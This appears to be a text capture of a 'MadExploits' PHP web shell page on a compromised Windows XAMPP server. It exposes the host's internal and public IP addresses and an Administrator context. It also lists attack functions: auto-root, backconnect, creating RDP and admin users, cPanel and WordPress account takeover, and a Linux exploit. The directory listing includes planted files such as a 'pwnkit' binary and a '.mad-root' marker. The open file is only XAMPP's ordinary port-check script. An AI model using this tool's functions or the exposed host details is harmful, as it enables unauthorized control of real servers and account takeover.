Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 3.149.214.28
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
install /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
.version
41
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
awk.exe
136
KB
-rwxrwxrwx
config.awk
380
B
-rw-rw-rw-
folder.ico
3.19
KB
-rw-rw-rw-
install.php
27.06
KB
-rw-rw-rw-
install.sys
115
B
-rw-rw-rw-
php.png
1.32
KB
-rw-rw-rw-
portcheck.bat
195
B
-rwxrwxrwx
portcheck.php
911
B
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
test.php
2.38
KB
-rw-rw-rw-
xampp-icon-uninstall.ico
30.17
KB
-rw-rw-rw-
xampp.ico
30.17
KB
-rw-rw-rw-
xamppbasic.inc
7.35
KB
-rw-rw-rw-
xamppserver.inc
149
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : portcheck.php
<?php $host = "127.0.0.1"; $timeout = 1; $i = 1; $curdir = getcwd(); $curdir = getcwd(); list($partition, $nonpartition) = preg_split ("/:/", $curdir); //Fix by Wiedmann $partwampp = substr(realpath(__FILE__), 0, strrpos(dirname(realpath(__FILE__)), '\\')); $portchecklog = $partwampp."\install\\portcheck.ini"; $port = ereg_replace('-', '', $argv[1]); $werte = substr_count($port, ','); $ports = explode(',', $port); $anzahl = count($ports); $datei = fopen($portchecklog, 'w+'); fputs($datei, "[Ports]\r\n"); while ($i <= $anzahl) { $a = $i - 1; settype($ports[$a], "integer"); if (($handle = @fsockopen($host, $ports[$a], $errno, $errstr, $timeout)) == false) { $print = "Port".$ports[$a]."=FREE\r\n"; } else { $print = "Port".$ports[$a]."=BLOCKED\r\n"; } fputs($datei, $print); @fclose($handle); $i++; } fclose($datei); exit; ?>
Close